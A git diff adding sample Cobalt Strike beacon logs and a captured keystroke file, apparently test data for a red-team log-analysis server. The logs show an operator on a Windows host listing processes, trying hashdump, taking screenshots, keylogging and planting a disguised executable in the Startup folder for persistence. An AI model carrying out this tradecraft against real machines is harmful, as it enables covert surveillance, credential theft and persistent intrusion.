UTC [checkin] host called home, sent: 12 bytes +03/30 07:56:18 UTC [output] +[System Process] 0 0 +System 0 4 +Registry 4 88 +smss.exe 4 404 +csrss.exe 496 512 +wininit.exe 496 588 +csrss.exe 580 596 +winlogon.exe 580 680 +services.exe 588 688 +lsass.exe 588 728 +svchost.exe 688 836 +fontdrvhost.exe 680 844 +fontdrvhost.exe 588 852 +svchost.exe 688 920 +svchost.exe 688 972 +svchost.exe 688 1012 +LogonUI.exe 680 496 +dwm.exe 680 756 +svchost.exe 688 1028 +svchost.exe 688 1040 +svchost.exe 688 1132 +svchost.exe 688 1140 +svchost.exe 688 1148 +svchost.exe 688 1156 +svchost.exe 688 1264 +svchost.exe 688 1304 +svchost.exe 688 1332 +svchost.exe 688 1368 +svchost.exe 688 1424 +svchost.exe 688 1464 +svchost.exe 688 1484 +svchost.exe 688 1620 +svchost.exe 688 1628 +svchost.exe 688 1732 +svchost.exe 688 1756 +svchost.exe 688 1772 +svchost.exe 688 1832 +taskhostw.exe 1132 1848 +svchost.exe 688 1872 +svchost.exe 688 1904 +svchost.exe 688 1924 +svchost.exe 688 2012 +svchost.exe 688 1528 +svchost.exe 688 1568 +svchost.exe 688 2052 +svchost.exe 688 2112 +svchost.exe 688 2240 +Memory Compression 4 2248 +svchost.exe 688 2284 +VSSVC.exe 688 2320 +svchost.exe 688 2384 +svchost.exe 688 2428 +svchost.exe 688 2448 +svchost.exe 688 2568 +svchost.exe 688 2656 +svchost.exe 688 2664 +svchost.exe 688 2672 +svchost.exe 688 2788 +svchost.exe 688 2796 +svchost.exe 688 2804 +svchost.exe 688 2920 +svchost.exe 688 2928 +spoolsv.exe 688 2512 +OfficeClickToRun.exe 688 3320 +sysmon64.exe 688 3328 +WaAppAgent.exe 688 3336 +WindowsAzureTelemetryService.exe 688 3344 +WindowsAzureGuestAgent.exe 688 3352 +WindowsAzureNetAgent.exe 688 3360 +svchost.exe 688 3368 +svchost.exe 688 3376 +svchost.exe 688 3384 +svchost.exe 688 3392 +svchost.exe 688 3400 +svchost.exe 688 3408 +svchost.exe 688 3416 +MsMpEng.exe 688 3424 +svchost.exe 688 3432 +svchost.exe 688 3796 +VFPlugin.exe 3360 3896 +conhost.exe 3896 3960 +unsecapp.exe 920 3236 +WmiPrvSE.exe 920 4104 +svchost.exe 688 4424 +svchost.exe 688 4468 +WmiPrvSE.exe 920 4712 +svchost.exe 688 4924 +svchost.exe 688 4960 +csrss.exe 5148 5156 +winlogon.exe 5148 5200 +fontdrvhost.exe 5200 5364 +dwm.exe 5200 5436 +svchost.exe 688 5628 +rdpclip.exe 1040 5988 x64 STROOP\w.tax 2 +sihost.exe 1484 6036 x64 STROOP\w.tax 2 +svchost.exe 688 6056 x64 STROOP\w.tax 2 +svchost.exe 688 6116 x64 STROOP\w.tax 2 +taskhostw.exe 1132 5312 x64 STROOP\w.tax 2 +svchost.exe 688 5592 +svchost.exe 688 4792 +ctfmon.exe 4792 5016 x64 STROOP\w.tax 2 +explorer.exe 6212 6236 x64 STROOP\w.tax 2 +svchost.exe 688 6252 +svchost.exe 688 6424 x64 STROOP\w.tax 2 +ShellExperienceHost.exe 920 6664 x64 STROOP\w.tax 2 +svchost.exe 688 6784 +SearchUI.exe 920 6832 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 6956 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 7112 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 6712 x64 STROOP\w.tax 2 +SearchIndexer.exe 688 6708 +svchost.exe 688 7208 +svchost.exe 688 7244 +svchost.exe 688 7316 +smartscreen.exe 920 7428 x64 STROOP\w.tax 2 +SecurityHealthSystray.exe 6236 7472 x64 STROOP\w.tax 2 +SecurityHealthService.exe 688 7512 +svchost.exe 688 7780 +WaSecAgentProv.exe 3336 5764 +conhost.exe 5764 6940 +SgrmBroker.exe 688 5720 +svchost.exe 688 1720 +svchost.exe 688 1992 +svchost.exe 688 2104 x64 STROOP\w.tax 2 +WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe 920 1456 x64 STROOP\w.tax 2 +dllhost.exe 920 3028 x64 STROOP\w.tax 2 +chrome.exe 6236 4396 x64 STROOP\w.tax 2 +svchost.exe 688 4752 +chrome.exe 4396 6272 x64 STROOP\w.tax 2 +chrome.exe 4396 5484 x64 STROOP\w.tax 2 +chrome.exe 4396 7688 x64 STROOP\w.tax 2 +chrome.exe 4396 7728 x64 STROOP\w.tax 2 +chrome.exe 4396 5080 x64 STROOP\w.tax 2 +POWERPNT.EXE 6236 6440 x86 STROOP\w.tax 2 +WmiPrvSE.exe 920 2008 +chrome.exe 4396 800 x64 STROOP\w.tax 2 +chrome.exe 4396 152 x64 STROOP\w.tax 2 +SearchProtocolHost.exe 6708 5552 +SearchFilterHost.exe 6708 6332 +WINWORD.EXE 2908 2212 x86 STROOP\w.tax 2 +rundll32.exe 2212 7872 x86 STROOP\w.tax 2 +svchost.exe 688 6472 + + +03/30 07:56:29 UTC [input] pwd +03/30 07:56:29 UTC [task] <> Tasked beacon to print working directory +03/30 07:56:32 UTC [checkin] host called home, sent: 8 bytes +03/30 07:56:32 UTC [output] +Current directory is C:\windows\system32 + +03/30 07:56:47 UTC [input] hashdump +03/30 07:56:47 UTC [error] hashdump error: this command requires administrator privileges +03/30 07:57:03 UTC [input] screenshot +03/30 07:57:03 UTC [task] Tasked beacon to take screenshot +03/30 07:57:05 UTC [checkin] host called home, sent: 162370 bytes +03/30 07:57:07 UTC [output] +received screenshot (200776 bytes) + +03/30 07:57:31 UTC [input] keylogger +03/30 07:57:31 UTC [task] Tasked beacon to log keystrokes +03/30 07:57:35 UTC [checkin] host called home, sent: 65602 bytes +03/30 07:58:09 UTC [output] +received keystrokes + +03/30 07:58:19 UTC [output] +received keystrokes + +03/30 07:58:24 UTC [input] screenshot +03/30 07:58:24 UTC [task] Tasked beacon to take screenshot +03/30 07:58:29 UTC [checkin] host called home, sent: 162370 bytes +03/30 07:58:30 UTC [output] +received keystrokes + +03/30 07:58:30 UTC [output] +received screenshot (223469 bytes) + +03/30 07:58:49 UTC [output] +received keystrokes + +03/30 07:58:59 UTC [output] +received keystrokes + +03/30 07:59:09 UTC [output] +received keystrokes + +03/30 07:59:18 UTC [output] +received keystrokes + +03/30 07:59:27 UTC [output] +received keystrokes + +03/30 07:59:37 UTC [output] +received keystrokes + +03/30 07:59:51 UTC [output] +received keystrokes + +03/30 08:00:00 UTC [output] +received keystrokes + +03/30 08:00:10 UTC [output] +received keystrokes + +03/30 08:02:47 UTC [output] +received keystrokes + +03/30 08:03:01 UTC [output] +received keystrokes + +03/30 08:03:10 UTC [output] +received keystrokes + +03/30 08:03:20 UTC [output] +received keystrokes + +03/30 08:03:30 UTC [output] +received keystrokes + +03/30 08:03:30 UTC [input] screenshot +03/30 08:03:30 UTC [task] Tasked beacon to take screenshot +03/30 08:03:34 UTC [checkin] host called home, sent: 162370 bytes +03/30 08:03:35 UTC [output] +received screenshot (242880 bytes) + +03/30 08:03:50 UTC [input] jobs +03/30 08:03:50 UTC [task] <> Tasked beacon to list jobs +03/30 08:03:55 UTC [checkin] host called home, sent: 8 bytes +03/30 08:03:55 UTC [output] +1 0 keystroke logger + + +03/30 08:04:51 UTC [input] cd c:\users +03/30 08:04:51 UTC [task] <> cd c:\users +03/30 08:04:52 UTC [checkin] host called home, sent: 16 bytes +03/30 08:04:55 UTC [input] pwd +03/30 08:04:55 UTC [task] <> Tasked beacon to print working directory +03/30 08:04:57 UTC [checkin] host called home, sent: 8 bytes +03/30 08:04:57 UTC [output] +Current directory is c:\users + +03/30 08:04:58 UTC [input] ls +03/30 08:04:58 UTC [task] <> Tasked beacon to list files in . +03/30 08:05:01 UTC [checkin] host called home, sent: 19 bytes +03/30 08:05:01 UTC [output] +c:\users\* +D 0 03/29/2020 11:36:14 . +D 0 03/29/2020 11:36:14 .. +D 0 09/15/2018 07:42:33 All Users +D 0 03/29/2020 10:17:23 bofh +D 0 03/29/2020 11:22:00 bofh.STROOP +D 0 03/07/2020 10:40:02 Default +D 0 09/15/2018 07:42:33 Default User +F 174 09/15/2018 07:31:34 desktop.ini +D 0 03/07/2020 10:35:06 Public +D 0 03/29/2020 11:36:22 w.tax + + +03/30 08:05:48 UTC [input] cd w.tax\AppData\Roaming\Microsoft\Windows\ +03/30 08:05:48 UTC [task] <> cd w.tax\AppData\Roaming\Microsoft\Windows\ +03/30 08:05:49 UTC [input] ls +03/30 08:05:49 UTC [task] <> Tasked beacon to list files in . +03/30 08:05:49 UTC [checkin] host called home, sent: 67 bytes +03/30 08:05:49 UTC [output] +c:\users\w.tax\AppData\Roaming\Microsoft\Windows\* +D 0 03/29/2020 11:36:24 . +D 0 03/29/2020 11:36:24 .. +D 0 03/29/2020 11:36:22 AccountPictures +D 0 09/15/2018 07:33:50 CloudStore +D 0 03/29/2020 11:36:22 Libraries +D 0 09/15/2018 07:33:50 Network Shortcuts +D 0 09/15/2018 07:33:50 Printer Shortcuts +D 0 03/30/2020 07:58:17 Recent +D 0 03/29/2020 11:37:29 SendTo +D 0 03/29/2020 11:36:22 Start Menu +D 0 09/15/2018 07:33:50 Templates +D 0 03/30/2020 07:45:52 Themes + + +03/30 08:05:54 UTC [input] cd Start Menu +03/30 08:05:54 UTC [task] <> cd Start Menu +03/30 08:05:54 UTC [checkin] host called home, sent: 18 bytes +03/30 08:05:56 UTC [input] ls +03/30 08:05:56 UTC [task] <> Tasked beacon to list files in . +03/30 08:05:59 UTC [checkin] host called home, sent: 19 bytes +03/30 08:05:59 UTC [output] +c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\* +D 0 03/29/2020 11:36:22 . +D 0 03/29/2020 11:36:22 .. +F 174 03/29/2020 11:36:22 desktop.ini +D 0 03/29/2020 11:36:22 Programs + + +03/30 08:06:03 UTC [input] cd Programs +03/30 08:06:03 UTC [task] <> cd Programs +03/30 08:06:04 UTC [input] ls +03/30 08:06:04 UTC [task] <> Tasked beacon to list files in . +03/30 08:06:04 UTC [checkin] host called home, sent: 35 bytes +03/30 08:06:04 UTC [output] +c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\* +D 0 03/29/2020 11:36:22 . +D 0 03/29/2020 11:36:22 .. +D 0 03/07/2020 00:55:56 Accessibility +D 0 03/29/2020 11:36:21 Accessories +D 0 03/29/2020 11:36:22 Administrative Tools +F 174 03/29/2020 11:36:22 desktop.ini +D 0 09/15/2018 07:33:54 Maintenance +D 0 03/29/2020 11:36:22 Startup +D 0 09/15/2018 07:33:54 System Tools +D 0 09/15/2018 07:34:10 Windows PowerShell + + +03/30 08:06:08 UTC [input] cd Startup +03/30 08:06:08 UTC [task] <> cd Startup +03/30 08:06:09 UTC [checkin] host called home, sent: 15 bytes +03/30 08:07:20 UTC [input] upload /Users/marcs/mousedrivercontrol.exe +03/30 08:07:20 UTC [task] <> Tasked beacon to upload /Users/marcs/mousedrivercontrol.exe as mousedrivercontrol.exe +03/30 08:07:20 UTC [indicator] file: 351274f85af9b22f88152ceb80456dd0 289280 bytes mousedrivercontrol.exe +03/30 08:07:21 UTC [checkin] host called home, sent: 289314 bytes +03/30 08:07:37 UTC [input] ls +03/30 08:07:37 UTC [task] <> Tasked beacon to list files in . +03/30 08:07:40 UTC [checkin] host called home, sent: 19 bytes +03/30 08:07:40 UTC [output] +c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\* +D 0 03/30/2020 08:07:21 . +D 0 03/30/2020 08:07:21 .. +F 174 03/29/2020 11:36:22 desktop.ini +F 289280 03/30/2020 08:07:21 mousedrivercontrol.exe + + +03/30 08:07:56 UTC [input] run mousedrivercontrol.exe +03/30 08:07:56 UTC [task] Tasked beacon to run: mousedrivercontrol.exe +03/30 08:07:59 UTC [checkin] host called home, sent: 40 bytes +03/30 08:08:13 UTC [input] ps +03/30 08:08:13 UTC [task] Tasked beacon to list processes +03/30 08:08:13 UTC [checkin] host called home, sent: 12 bytes +03/30 08:08:13 UTC [output] +[System Process] 0 0 +System 0 4 +Registry 4 88 +smss.exe 4 404 +csrss.exe 496 512 +wininit.exe 496 588 +csrss.exe 580 596 +winlogon.exe 580 680 +services.exe 588 688 +lsass.exe 588 728 +svchost.exe 688 836 +fontdrvhost.exe 680 844 +fontdrvhost.exe 588 852 +svchost.exe 688 920 +svchost.exe 688 972 +svchost.exe 688 1012 +LogonUI.exe 680 496 +dwm.exe 680 756 +svchost.exe 688 1040 +svchost.exe 688 1132 +svchost.exe 688 1140 +svchost.exe 688 1148 +svchost.exe 688 1156 +svchost.exe 688 1264 +svchost.exe 688 1304 +svchost.exe 688 1332 +svchost.exe 688 1368 +svchost.exe 688 1424 +svchost.exe 688 1464 +svchost.exe 688 1484 +svchost.exe 688 1620 +svchost.exe 688 1628 +svchost.exe 688 1732 +svchost.exe 688 1756 +svchost.exe 688 1772 +svchost.exe 688 1832 +taskhostw.exe 1132 1848 +svchost.exe 688 1872 +svchost.exe 688 1904 +svchost.exe 688 1924 +svchost.exe 688 2012 +svchost.exe 688 1528 +svchost.exe 688 1568 +svchost.exe 688 2052 +svchost.exe 688 2112 +svchost.exe 688 2240 +Memory Compression 4 2248 +svchost.exe 688 2284 +VSSVC.exe 688 2320 +svchost.exe 688 2384 +svchost.exe 688 2428 +svchost.exe 688 2448 +svchost.exe 688 2568 +svchost.exe 688 2656 +svchost.exe 688 2664 +svchost.exe 688 2672 +svchost.exe 688 2788 +svchost.exe 688 2796 +svchost.exe 688 2804 +svchost.exe 688 2920 +svchost.exe 688 2928 +spoolsv.exe 688 2512 +OfficeClickToRun.exe 688 3320 +sysmon64.exe 688 3328 +WaAppAgent.exe 688 3336 +WindowsAzureTelemetryService.exe 688 3344 +WindowsAzureGuestAgent.exe 688 3352 +WindowsAzureNetAgent.exe 688 3360 +svchost.exe 688 3368 +svchost.exe 688 3376 +svchost.exe 688 3384 +svchost.exe 688 3392 +svchost.exe 688 3400 +svchost.exe 688 3408 +svchost.exe 688 3416 +MsMpEng.exe 688 3424 +svchost.exe 688 3432 +svchost.exe 688 3796 +VFPlugin.exe 3360 3896 +conhost.exe 3896 3960 +unsecapp.exe 920 3236 +WmiPrvSE.exe 920 4104 +svchost.exe 688 4424 +WmiPrvSE.exe 920 4712 +svchost.exe 688 4924 +svchost.exe 688 4960 +csrss.exe 5148 5156 +winlogon.exe 5148 5200 +fontdrvhost.exe 5200 5364 +dwm.exe 5200 5436 +svchost.exe 688 5628 +rdpclip.exe 1040 5988 x64 STROOP\w.tax 2 +sihost.exe 1484 6036 x64 STROOP\w.tax 2 +svchost.exe 688 6056 x64 STROOP\w.tax 2 +svchost.exe 688 6116 x64 STROOP\w.tax 2 +taskhostw.exe 1132 5312 x64 STROOP\w.tax 2 +svchost.exe 688 5592 +svchost.exe 688 4792 +ctfmon.exe 4792 5016 x64 STROOP\w.tax 2 +explorer.exe 6212 6236 x64 STROOP\w.tax 2 +svchost.exe 688 6252 +svchost.exe 688 6424 x64 STROOP\w.tax 2 +ShellExperienceHost.exe 920 6664 x64 STROOP\w.tax 2 +svchost.exe 688 6784 +SearchUI.exe 920 6832 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 6956 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 7112 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 6712 x64 STROOP\w.tax 2 +SearchIndexer.exe 688 6708 +svchost.exe 688 7208 +svchost.exe 688 7244 +svchost.exe 688 7316 +smartscreen.exe 920 7428 x64 STROOP\w.tax 2 +SecurityHealthSystray.exe 6236 7472 x64 STROOP\w.tax 2 +SecurityHealthService.exe 688 7512 +svchost.exe 688 7780 +WaSecAgentProv.exe 3336 5764 +conhost.exe 5764 6940 +SgrmBroker.exe 688 5720 +svchost.exe 688 1720 +svchost.exe 688 1992 +svchost.exe 688 2104 x64 STROOP\w.tax 2 +WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe 920 1456 x64 STROOP\w.tax 2 +dllhost.exe 920 3028 x64 STROOP\w.tax 2 +chrome.exe 6236 4396 x64 STROOP\w.tax 2 +svchost.exe 688 4752 +chrome.exe 4396 6272 x64 STROOP\w.tax 2 +chrome.exe 4396 5484 x64 STROOP\w.tax 2 +chrome.exe 4396 7688 x64 STROOP\w.tax 2 +chrome.exe 4396 7728 x64 STROOP\w.tax 2 +chrome.exe 4396 5080 x64 STROOP\w.tax 2 +POWERPNT.EXE 6236 6440 x86 STROOP\w.tax 2 +chrome.exe 4396 800 x64 STROOP\w.tax 2 +chrome.exe 4396 152 x64 STROOP\w.tax 2 +WINWORD.EXE 2908 2212 x86 STROOP\w.tax 2 +rundll32.exe 2212 7872 x86 STROOP\w.tax 2 +rundll32.exe 7872 3816 x86 STROOP\w.tax 2 +MSOSYNC.EXE 6440 1644 x86 STROOP\w.tax 2 +svchost.exe 688 3724 +svchost.exe 688 64 +svchost.exe 688 3728 +TrustedInstaller.exe 688 2540 +TiWorker.exe 920 4692 +svchost.exe 688 7660 +svchost.exe 688 4356 + + +03/30 08:08:45 UTC [input] run c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mousedrivercontrol.exe +03/30 08:08:45 UTC [task] Tasked beacon to run: c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mousedrivercontrol.exe +03/30 08:08:46 UTC [checkin] host called home, sent: 117 bytes +03/30 08:09:48 UTC [output] +received keystrokes + +03/30 08:09:58 UTC [output] +received keystrokes + +03/30 08:10:07 UTC [output] +received keystrokes + +03/30 08:10:45 UTC [input] jobkill 1 +03/30 08:10:45 UTC [task] <> Tasked beacon to kill job 1 +03/30 08:10:45 UTC [checkin] host called home, sent: 10 bytes +03/30 08:10:48 UTC [input] jobs +03/30 08:10:48 UTC [task] <> Tasked beacon to list jobs +03/30 08:10:50 UTC [checkin] host called home, sent: 8 bytes +03/30 08:10:50 UTC [output] + + +03/30 08:13:29 UTC [input] upload /Users/marcs/mousedrivercontrol.exe +03/30 08:13:30 UTC [task] <> Tasked beacon to upload /Users/marcs/mousedrivercontrol.exe as mousedrivercontrol.exe +03/30 08:13:30 UTC [indicator] file: 4c859c9ba229c6018c91eb00d075674a 288256 bytes mousedrivercontrol.exe +03/30 08:13:32 UTC [checkin] host called home, sent: 288290 bytes +03/30 08:13:35 UTC [input] ls +03/30 08:13:35 UTC [task] <> Tasked beacon to list files in . +03/30 08:13:37 UTC [checkin] host called home, sent: 19 bytes +03/30 08:13:37 UTC [output] +c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\* +D 0 03/30/2020 08:07:21 . +D 0 03/30/2020 08:07:21 .. +F 174 03/29/2020 11:36:22 desktop.ini +F 288256 03/30/2020 08:13:32 mousedrivercontrol.exe + + +03/30 08:13:45 UTC [input] run c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mousedrivercontrol.exe +03/30 08:13:45 UTC [task] Tasked beacon to run: c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mousedrivercontrol.exe +03/30 08:13:46 UTC [checkin] host called home, sent: 117 bytes +03/30 08:14:20 UTC [input] sleep 30 5 +03/30 08:14:20 UTC [task] Tasked beacon to sleep for 30s (5% jitter) +03/30 08:14:20 UTC [checkin] host called home, sent: 16 bytes +03/30 08:41:54 UTC [input] note beacon initial access diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/keystrokes/keystrokes_936715360.txt b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/keystrokes/keystrokes_936715360.txt new file mode 100644 index 00000000..2ad1d1f9 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/keystrokes/keystrokes_936715360.txt @@ -0,0 +1,81 @@ +03/30 07:58:09 UTC Received keystrokes + + + +CSave As +E======= +RecipeTeammeeting_ +03/30 07:58:19 UTC Received keystrokes + +Apr1_newrecipes +03/30 07:58:30 UTC Received keystrokes + + + +03/30 07:58:49 UTC Received keystrokes + + + +CRecipeTeammeeting_Apr1_newrecipes - PowerPoint +E======= +2021 +03/30 07:58:59 UTC Received keystrokes + +2020 & Holidat season 20202[left]2[left]2[left]2[left]2[left] +03/30 07:59:09 UTC Received keystrokes + +2[left]2[left]2[left]2[left]2[left]2[left]2[left]2[left]y2[end] +2021 introduces +03/30 07:59:18 UTC Received keystrokes + + new 'special' flavour' 2[left]2[left]2[left]2[left]2[left]2[left] +03/30 07:59:27 UTC Received keystrokes + +2[end] +03/30 07:59:37 UTC Received keystrokes + + +We need to act now to j2[backspace]eep ahe +03/30 07:59:51 UTC Received keystrokes + +ad of competitors2[right]k +03/30 08:00:00 UTC Received keystrokes + + +2[tab] +03/30 08:00:10 UTC Received keystrokes + +Decided: +03/30 08:02:47 UTC Received keystrokes + +Ani +03/30 08:03:01 UTC Received keystrokes + +se snowflakes +2[tab]Decided +03/30 08:03:10 UTC Received keystrokes + +: Peanut +03/30 08:03:20 UTC Received keystrokes + + butter OR +03/30 08:03:30 UTC Received keystrokes + +Nutella +03/30 08:09:48 UTC Received keystrokes + + + +C +E======= +2[command] +03/30 08:09:58 UTC Received keystrokes + + + +CSearch +E======= +start +03/30 08:10:07 UTC Received keystrokes + + up2[down]2[down]2[right] diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_075707_936715360.jpg b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_075707_936715360.jpg new file mode 100644 index 00000000..d1b84da9 Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_075707_936715360.jpg differ diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_075830_936715360.jpg b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_075830_936715360.jpg new file mode 100644 index 00000000..d1162904 Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_075830_936715360.jpg differ diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_080335_936715360.jpg b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_080335_936715360.jpg new file mode 100644 index 00000000..ee69571d Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_080335_936715360.jpg differ diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.11/beacon_1282172642.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.11/beacon_1282172642.log new file mode 100644 index 00000000..1309b752 --- /dev/null +++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.11/beacon_1282172642.log @@ -0,0 +1,5994 @@ +03/30 08:44:17 UTC [metadata] 13.81.175.72 <- 10.1.3.11; computer: L-WIN224; user: W.Tax *; process: wsmprovhost.exe; pid: 4164; os: Windows; version: 10.0; beacon arch: x64 (x64) +03/30 08:44:25 UTC [input] ps +03/30 08:44:25 UTC [task] Tasked beacon to list processes +03/30 08:44:27 UTC [checkin] host called home, sent: 12 bytes +03/30 08:44:27 UTC [output] +[System Process] 0 0 +System 0 4 x64 0 +Registry 4 88 x64 NT AUTHORITY\SYSTEM 0 +smss.exe 4 404 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 504 512 x64 NT AUTHORITY\SYSTEM 0 +wininit.exe 504 584 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 576 592 x64 NT AUTHORITY\SYSTEM 1 +winlogon.exe 576 676 x64 NT AUTHORITY\SYSTEM 1 +services.exe 584 692 x64 NT AUTHORITY\SYSTEM 0 +lsass.exe 584 724 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 832 x64 NT AUTHORITY\SYSTEM 0 +fontdrvhost.exe 676 840 x64 Font Driver Host\UMFD-1 1 +fontdrvhost.exe 584 848 x64 Font Driver Host\UMFD-0 0 +svchost.exe 692 916 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 956 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 1012 x64 NT AUTHORITY\SYSTEM 0 +LogonUI.exe 676 508 x64 NT AUTHORITY\SYSTEM 1 +dwm.exe 676 744 x64 Window Manager\DWM-1 1 +svchost.exe 692 932 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 972 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 1092 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1100 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1132 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1168 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1224 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1288 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1296 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1348 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 1432 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1476 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1496 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1668 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 1680 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1692 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1752 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1760 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1788 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1888 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1916 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1936 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1084 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 1448 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 1452 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2004 x64 NT AUTHORITY\SYSTEM 0 +Memory Compression 4 2208 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2236 x64 NT AUTHORITY\SYSTEM 0 +VSSVC.exe 692 2248 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2256 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 2308 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2344 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2384 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2432 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2480 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2644 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2652 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2756 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2764 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2772 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 2780 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 2892 x64 NT AUTHORITY\SYSTEM 0 +spoolsv.exe 692 2972 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 2980 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3092 x64 NT AUTHORITY\NETWORK SERVICE 0 +OfficeClickToRun.exe 692 3104 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3112 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3132 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 3200 x64 NT AUTHORITY\SYSTEM 0 +WaAppAgent.exe 692 3220 x64 NT AUTHORITY\SYSTEM 0 +sysmon64.exe 692 3236 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureGuestAgent.exe 692 3304 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3312 x64 NT AUTHORITY\LOCAL SERVICE 0 +MsMpEng.exe 692 3324 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureNetAgent.exe 692 3340 x64 NT AUTHORITY\SYSTEM 0 +WindowsAzureTelemetryService.exe 692 3364 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3372 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3380 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 3444 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 3540 x64 NT AUTHORITY\LOCAL SERVICE 0 +VFPlugin.exe 3340 3740 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 3740 3764 x64 NT AUTHORITY\SYSTEM 0 +unsecapp.exe 916 1420 x64 NT AUTHORITY\SYSTEM 0 +WmiPrvSE.exe 916 4140 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 4348 x64 NT AUTHORITY\NETWORK SERVICE 0 +svchost.exe 692 4688 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 4744 x64 NT AUTHORITY\SYSTEM 0 +taskhostw.exe 1168 4128 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 4444 x64 NT AUTHORITY\LOCAL SERVICE 0 +svchost.exe 692 